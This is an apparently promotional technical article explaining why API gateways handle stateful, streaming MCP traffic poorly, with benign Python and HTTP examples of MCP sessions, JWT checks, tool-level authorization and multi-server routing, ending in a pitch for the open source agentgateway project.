The API gateway rarely operates on the request body. When it does, it's to perform minor transformations or pull pieces out into headers or metadata that can be used for routing. The body typically follows a predictable schema (such as an OpenAPI spec) that can be validated and transformed using straightforward mapping rules when needed. Most importantly, each request stands alone: there's no session state to maintain between calls.

Remote MCP servers flip this model completely on its head. First, an MCP client connects to an MCP server with an "initialize" message and negotiates various protocol settings. Second, the server assigns a session ID (returned in the Mcp-Session-Id header) that coordinates all subsequent interactions for that client. This session maintains critical context/state, including:

  • Protocol capabilities negotiated between client and server (which optional features are available).
  • Tool result/context from previous tool calls and responses.
  • Asynchronous tool call state; streaming updates/notifications.
  • State about requested information from the server to the client.

Unlike REST APIs, where each request carries complete context in headers, MCP requests contain minimal routing information in the HTTP layer. The entire protocol is in the body of the HTTP request. A typical MCP request looks like this:

POST /mcp
Mcp-Session-Id: session_abc123
Content-Type: application/json

{
  "jsonrpc": "2.0", 
  "method": "tools/call",
  "params": { 
    "name": "database_query",
    "arguments": { /* complex nested structure */ }
  },
  "id": "call_456"
}


Everything meaningful lives in the JSON-RPC body: the method type, the specific tool being called and the parameters. The HTTP layer is just a “dumb” transport.

Even more challenging, MCP servers can initiate communication back to clients through Server-Sent Events (SSE), sending progress updates, streaming results or even new requests (elicitations, sampling, etc.). This bidirectional, session-aware communication pattern is fundamentally different from the request-response model that API gateways were designed around.
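A minimal client sketch makes the statefulness visible: one POST performs the initialize handshake, and the server-assigned Mcp-Session-Id header must accompany every call that follows. The endpoint, protocol version, and tool names below are illustrative, and the sketch omits the follow-up initialized notification a full client would send.

import requests

ENDPOINT = "https://mcp.example.internal/mcp"  # hypothetical server

# Step 1: initialize negotiates protocol version and capabilities.
init = requests.post(ENDPOINT, json={
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "2025-03-26",
        "capabilities": {},
        "clientInfo": {"name": "sketch-client", "version": "0.1"},
    },
    "id": 1,
})
session_id = init.headers["Mcp-Session-Id"]  # server-assigned session state

# Step 2: every later request carries the session header; the HTTP layer
# alone tells a gateway almost nothing about what is being asked.
requests.post(ENDPOINT, headers={"Mcp-Session-Id": session_id}, json={
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {"name": "database_query", "arguments": {"q": "SELECT 1"}},
    "id": 2,
})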

Can You Use Your API Gateway as an MCP Gateway?

As we can see, there are fundamental differences between the two models. But there are similarities, right? They’re both over HTTP. We can apply JWT/token/OAuth-style security. And it’s not a stretch that API gateways can operate on a request body. So, can you use your API gateway to govern your MCP services?

Here’s a nonexhaustive list of what you MAY need your API gateway to do:

  • Parse request body and responses (JSON-RPC), implement protocol semantics.
  • Inject policy decisions (allow/deny) on pieces of the body (tool lists, tool calls, resource requests, etc.).
  • Handle a single HTTP POST from an MCP client that results in multiple responses streamed back (SSE).
  • Inject policy enforcement into that stream.
  • Once the stream is established, proxy requests from the MCP server to the MCP client.
  • Broker differences between MCP clients and MCP servers.
  • Present a single logical MCP server to an MCP client (virtual MCP server), which may be multiple MCP servers in the backend.

An API gateway can do some of this, so let’s look at the common MCP gateway patterns from simple to more complex:

  • Simple passthrough proxy
  • Partial protocol understanding
  • MCP brokering
  • MCP multiplexing

Simple Passthrough Proxy

At the most basic level, your API gateway can act as a passthrough proxy for MCP traffic. In this scenario, the gateway treats MCP requests like any other HTTP POST with a JSON payload. It doesn’t understand the JSON-RPC structure or MCP semantics, but it can still provide some value:

What Works Well:

  • HTTP-level authentication (API keys, OAuth tokens)
  • Basic rate limiting per client or IP
  • Transport Layer Security (TLS) termination and certificate management
  • Request/response logging and metrics

For example, you may want to check that a JWT is included in the HTTP Authorization header and validate the JWT against a trusted IdP. This is basic HTTP handling, and any API gateway can do this. What happens if the response is an SSE stream? Luckily, most modern API gateways can also return a stream of events. If we want to implement some policy on the response (for example, what tools a client can see), then we need to understand the SSE events. A simple passthrough proxy approach wouldn’t allow us to do that.
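As for the authentication half, that HTTP-level check is ordinary JWT validation, sketched below with the PyJWT library against a JWKS endpoint; the IdP URL, issuer, and audience are placeholders.

import jwt  # third-party: pip install pyjwt
from jwt import PyJWKClient

JWKS_URL = "https://idp.example.com/.well-known/jwks.json"  # hypothetical IdP

def validate(authorization_header: str) -> dict:
    token = authorization_header.removeprefix("Bearer ")
    signing_key = PyJWKClient(JWKS_URL).get_signing_key_from_jwt(token)
    # Raises if the signature, expiry, issuer, or audience fail to verify.
    return jwt.decode(
        token,
        signing_key.key,
        algorithms=["RS256"],
        audience="mcp-gateway",            # hypothetical audience
        issuer="https://idp.example.com",  # hypothetical issuer
    )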

Gateway Limitations With SSE:

  • No streaming policy enforcement: The gateway can’t inspect or filter individual SSE events.
  • Limited observability: Can’t track progress, detect errors or measure per-event latency.
  • No midstream authorization: Can’t revoke access or apply policies as the stream progresses.
  • Session context lost: Multiple SSE events are part of one logical MCP operation, but the gateway sees them as independent chunks.

Think of it like putting a generic reverse proxy in front of a database. You get connection pooling and basic monitoring, but no query-level insights or policies. The moment you need to understand what’s flowing through the proxy, you’ve outgrown this approach.

Partial Protocol Support

Here’s where things get interesting (and complex). With enough custom development, you can teach your API gateway to parse MCP JSON-RPC payloads and extract meaningful information for policy decisions. Most API gateways support custom body parsing through JavaScript/Lua/template policies or similar scripting mechanisms. For example, in Apigee, you can call out to a JavaScript extension policy to implement custom parsing and policy.

What Becomes Possible:

  • Better understanding of JSON-RPC requests.
  • Apply tool-level authorization (“marketing users can’t call database_query”).
  • Basic request transformation and validation.
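For instance, tool-level authorization reduces to a few lines once the body is parsed; it is sketched here in plain Python rather than a gateway's JavaScript policy, with hypothetical role and tool names. The logic is trivial; the brittleness comes from maintaining it inside gateway scripting as tools evolve.

import json

ALLOWED_TOOLS = {
    "marketing": {"web_search", "send_email"},
    "engineering": {"web_search", "database_query"},
}

def authorize(role: str, raw_body: bytes) -> bool:
    """Allow the request unless it is a tools/call for a forbidden tool."""
    body = json.loads(raw_body)
    if body.get("method") != "tools/call":
        return True  # this policy only governs tool invocation
    tool = body.get("params", {}).get("name", "")
    return tool in ALLOWED_TOOLS.get(role, set())

# Example: marketing users can't call database_query.
request = json.dumps({"jsonrpc": "2.0", "method": "tools/call",
                      "params": {"name": "database_query"}, "id": 7}).encode()
assert authorize("marketing", request) is False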

The painful reality: This approach quickly becomes brittle and expensive to maintain:

  • Dynamic parsing complexity: MCP tool lists have arbitrary length and structure. Your JSONPath expressions become increasingly complex and fragile.
  • Performance overhead: JavaScript policies are slower than native gateway policies.
  • Maintenance burden: Every new MCP tool may require updating gateway policies. Your infrastructure team becomes coupled to your MCP server development.
  • Limited streaming support: While some gateways support SSEs, applying policy midstream becomes exponentially more complex.

What happens in practice is that you end up building a gateway on top of an existing gateway, fighting to implement new features or squeeze out performance improvements.

MCP Brokering

MCP brokering involves the gateway actively participating in the MCP protocol conversation: not just proxying requests, but potentially modifying, filtering, or enhancing them based on policy decisions. For example, an MCP client can connect to the MCP gateway with one version of the MCP protocol, and the MCP gateway can mediate/broker to a different version. A capability like this is critical in enterprise environments, where it may be impossible to update all MCP clients at once when an MCP server moves to a new version of the protocol.

Additional brokering use cases build on the previous pattern:

  • Version shielding: Shielding an MCP client from breaking changes when performing an MCP server upgrade.
  • Request filtering: Remove tools from discovery responses based on backward compatibility requirements.
  • Response sanitization: Strip sensitive data from tool responses based on user clearance levels.
  • Context injection: Add enterprise context (user ID, tenant info) to tool calls.
  • Error handling: Convert MCP protocol errors into enterprise-compliant audit events.

Traditional API gateways struggle with this because they lack native JSON-RPC understanding and session-aware policy engines.

MCP Multiplexing

This is where traditional API gateways hit a wall. MCP multiplexing involves aggregating multiple backend MCP servers into a single logical endpoint, which we call “virtual MCP.”

For example, a client connects to one MCP endpoint but actually gets access to tools from multiple backend servers:

  • Weather tools from weather-service.internal
  • Database tools from analytics-service.internal
  • Email tools from notification-service.internal

Instead of AI agents needing to know about and connect to dozens of different MCP servers, they connect to one virtualized endpoint that provides a unified interface to all enterprise tools.

The complexity explosion: Implementing this requires capabilities that traditional API gateways simply don’t have:

  1. Session fan-out: When a client sends “tools/list,” the gateway must query all backend servers and merge results.
  2. Request routing: Tool calls must be routed to the correct backend based on the tool name.
  3. Response multiplexing: Streaming responses from multiple backends must be merged into a single SSE stream.
  4. State coordination: Session IDs and protocol negotiations must be managed across multiple backend connections.
  5. Error handling: Failures in one backend shouldn’t break the entire virtual session.

This level of protocol-aware aggregation and virtualization is beyond what traditional API gateways were designed to handle. You’d essentially need to rewrite the gateway’s core request/response handling logic to support MCP session semantics.
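To make the fan-out and routing steps tangible, here is a deliberately naive sketch in Python: it merges tools/list results from several backends and routes each tools/call by tool name. Backend URLs are hypothetical, and everything a real gateway must also do (per-backend session management, SSE merging, partial-failure handling) is omitted.

import requests

BACKENDS = [
    "https://weather-service.internal/mcp",
    "https://analytics-service.internal/mcp",
    "https://notification-service.internal/mcp",
]

def list_tools() -> dict[str, str]:
    """Map tool name -> owning backend by querying every server."""
    routing = {}
    for backend in BACKENDS:
        resp = requests.post(backend, json={
            "jsonrpc": "2.0", "method": "tools/list", "params": {}, "id": 1,
        })
        for tool in resp.json()["result"]["tools"]:
            routing[tool["name"]] = backend  # last writer wins on collisions
    return routing

def call_tool(routing: dict[str, str], name: str, arguments: dict) -> dict:
    """Route a tools/call to whichever backend advertised the tool."""
    resp = requests.post(routing[name], json={
        "jsonrpc": "2.0", "method": "tools/call",
        "params": {"name": name, "arguments": arguments}, "id": 2,
    })
    return resp.json()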

Agentgateway: Built for MCP From the Ground Up

Agentgateway, an open source Linux Foundation project, was purpose-built in Rust for AI agent protocols like MCP, drawing on lessons learned from building API gateways. Unlike traditional API gateways optimized for stateless REST interactions, agentgateway natively understands JSON-RPC message structures, maintains stateful session mappings and handles the bidirectional communication patterns inherent to MCP.

This deep protocol awareness allows it to properly multiplex and demultiplex MCP sessions, fan out client requests across multiple backend MCP servers, aggregate tool lists and maintain the critical two-way session mapping needed when servers initiate messages back to clients. Rather than fighting against an architecture designed for request-response APIs, agentgateway’s foundation aligns perfectly with MCP’s session-oriented, streaming communication model.

Building on this foundation, agentgateway serves as a native MCP gateway, large language model (LLM) gateway and agent-to-agent (A2A) proxy, providing the security, observability and governance capabilities that traditional API gateways cannot deliver.

It supports MCP multiplexing to federate tools from multiple backend servers, applies fine-grained authorization policies to control which tools clients can access and handles both stdio and HTTP Streamable transports seamlessly.

And when integrated with the Cloud Native Computing Foundation (CNCF) project kgateway as a control plane, agentgateway becomes Kubernetes native, enabling teams to manage MCP services using standard gateway API resources while the proxy takes care of the protocol-specific complexities.

This purpose-built approach delivers the performance, safety and operational simplicity enterprises need for production MCP deployments — without the brittleness, maintenance burden and architectural compromises of retrofitting an API gateway.


